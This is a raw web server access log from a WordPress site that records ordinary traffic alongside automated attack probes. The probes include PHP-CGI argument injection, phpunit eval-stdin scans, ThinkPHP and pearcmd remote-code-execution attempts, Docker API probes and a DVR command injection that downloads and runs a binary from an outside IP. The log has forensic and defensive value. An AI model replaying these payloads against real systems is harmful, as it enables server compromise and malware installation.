43.157.180.116 - - [10/Jan/2026:18:55:51 +0800] "GET / HTTP/1.1" 200 34275 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.159.141.150 - - [10/Jan/2026:18:56:44 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Jan/2026:19:03:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768042982.7075328826904296875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [10/Jan/2026:19:03:03 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.90.208.132 - - [10/Jan/2026:19:54:46 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.0" 200 79446 "http://cqqizhou.com/portfolio/duplex-stainless-steel/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [10/Jan/2026:19:54:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768046097.2233419418334960937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
85.90.208.132 - - [10/Jan/2026:19:54:57 +0800] "GET /wp-login.php?action=register HTTP/1.0" 302 0 "http://cqqizhou.com/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
85.90.208.132 - - [10/Jan/2026:19:55:08 +0800] "GET /wp-login.php?action=register HTTP/1.0" 302 0 "http://cqqizhou.com/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
36.133.115.36 - - [10/Jan/2026:19:55:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768046154.1613309383392333984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
134.65.30.157 - - [10/Jan/2026:19:55:54 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31364 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:00 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 155928 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:04 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:07 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:08 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:11 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:13 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:15 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:17 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:18 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:22 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:25 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:26 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:31 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:32 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:34 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:40 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:42 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:43 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:44 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:45 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:46 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:47 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:51 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:52 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:54 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:56 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:57 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:56:59 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:00 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:02 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:03 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:05 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:10 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:12 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:13 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:15 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:17 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:18 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [10/Jan/2026:19:57:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768046240.7808389663696289062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
134.65.30.157 - - [10/Jan/2026:19:57:20 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65505 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:27 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:31 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 155928 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:36 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 155928 "-" "libredtail-http"
36.133.115.36 - - [10/Jan/2026:19:57:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768046268.8792419433593750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
134.65.30.157 - - [10/Jan/2026:19:57:48 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
134.65.30.157 - - [10/Jan/2026:19:57:52 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [10/Jan/2026:20:00:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768046416.0795741081237792968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
45.135.194.23 - - [10/Jan/2026:20:00:17 +0800] "GET / HTTP/1.1" 200 155928 "-" "-"
36.133.115.36 - - [10/Jan/2026:20:01:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768046500.2869689464569091796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [10/Jan/2026:20:01:40 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Jan/2026:20:12:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768047127.9477970600128173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
74.7.243.243 - - [10/Jan/2026:20:12:08 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.39 - - [10/Jan/2026:20:12:08 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
36.133.115.36 - - [10/Jan/2026:20:23:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768047812.3856809139251708984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
207.154.250.140 - - [10/Jan/2026:20:23:32 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
36.133.115.36 - - [10/Jan/2026:20:28:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768048114.8331100940704345703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [10/Jan/2026:20:28:35 +0800] "POST / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [10/Jan/2026:20:35:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768048520.5805890560150146484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.213 - - [10/Jan/2026:20:35:20 +0800] "GET /?s=2025 HTTP/1.1" 200 19817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:20:49:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768049351.5773799419403076171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [10/Jan/2026:20:49:11 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Jan/2026:21:02:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768050135.2655210494995117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
220.197.78.125 - - [10/Jan/2026:21:02:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Mobile Safari/537.36"
43.248.109.112 - - [10/Jan/2026:21:02:20 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Mobile Safari/537.36"
36.133.115.36 - - [10/Jan/2026:21:12:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768050768.7162790298461914062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.14.245 - - [10/Jan/2026:21:12:48 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.14.245 - - [10/Jan/2026:21:12:56 +0800] "GET / HTTP/1.1" 200 34275 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Jan/2026:21:22:02 +0800] "POST /wp-cron.php?doing_wp_cron=1768051321.9706819057464599609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.18 - - [10/Jan/2026:21:22:02 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
204.76.203.18 - - [10/Jan/2026:21:22:05 +0800] "GET /backup/ HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [10/Jan/2026:21:23:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768051397.8460869789123535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
65.38.25.38 - - [10/Jan/2026:21:23:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0"
36.133.115.36 - - [10/Jan/2026:21:27:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768051631.7101180553436279296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
176.65.148.186 - - [10/Jan/2026:21:27:11 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F84.200.87.36%2Fdvr%3B%20chmod%20777%20dvr%3B%20.%2Fdvr%3B HTTP/1.1" 404 8980 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:21:45:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768052747.1883490085601806640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [10/Jan/2026:21:45:47 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Jan/2026:22:12:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768054371.1849110126495361328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
125.17.108.32 - - [10/Jan/2026:22:12:51 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31364 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:53 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 155928 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:54 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:55 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:56 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:57 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:12:59 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:00 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:01 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
170.106.35.187 - - [10/Jan/2026:22:13:02 +0800] "GET / HTTP/1.1" 200 34275 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
125.17.108.32 - - [10/Jan/2026:22:13:02 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:04 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:05 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:06 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:07 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:08 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:09 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:11 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:12 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:13 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:14 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:15 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:16 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:17 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:18 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:20 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:21 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:22 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:23 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:25 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:26 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:27 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:28 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:30 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:31 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:32 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:34 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:35 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:36 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:38 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:40 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65505 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:41 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:43 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 155928 "-" "libredtail-http"
36.133.115.36 - - [10/Jan/2026:22:13:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768054426.1908040046691894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
125.17.108.32 - - [10/Jan/2026:22:13:46 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 155928 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:48 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
125.17.108.32 - - [10/Jan/2026:22:13:58 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
40.77.167.67 - - [10/Jan/2026:22:18:11 +0800] "GET /news/page/2/ HTTP/1.1" 200 19553 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.3 - - [10/Jan/2026:22:21:01 +0800] "GET /2160/ HTTP/1.1" 200 29390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:22:34:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768055654.4049639701843261718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
180.76.30.8 - - [10/Jan/2026:22:34:14 +0800] "GET /wp-json/oembed/1.0/embed?url=http://cqqizhou.com/2418/ HTTP/1.1" 200 1280 "http://m.baidu.com/s?wd=conditionh29" "pc"
124.237.181.82 - - [10/Jan/2026:22:35:14 +0800] "GET /2418/ HTTP/1.1" 200 23692 "http://m.baidu.com/s?wd=privateg6t" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
124.237.211.94 - - [10/Jan/2026:22:35:36 +0800] "GET /2420/ HTTP/1.1" 200 23582 "http://m.baidu.com/s?wd=equal7fo" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"
36.133.115.36 - - [10/Jan/2026:22:40:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768056040.7051229476928710937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
13.220.80.123 - - [10/Jan/2026:22:40:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
52.167.144.197 - - [10/Jan/2026:22:41:03 +0800] "GET /2418/ HTTP/1.1" 200 23692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [10/Jan/2026:22:41:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768056067.5488870143890380859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
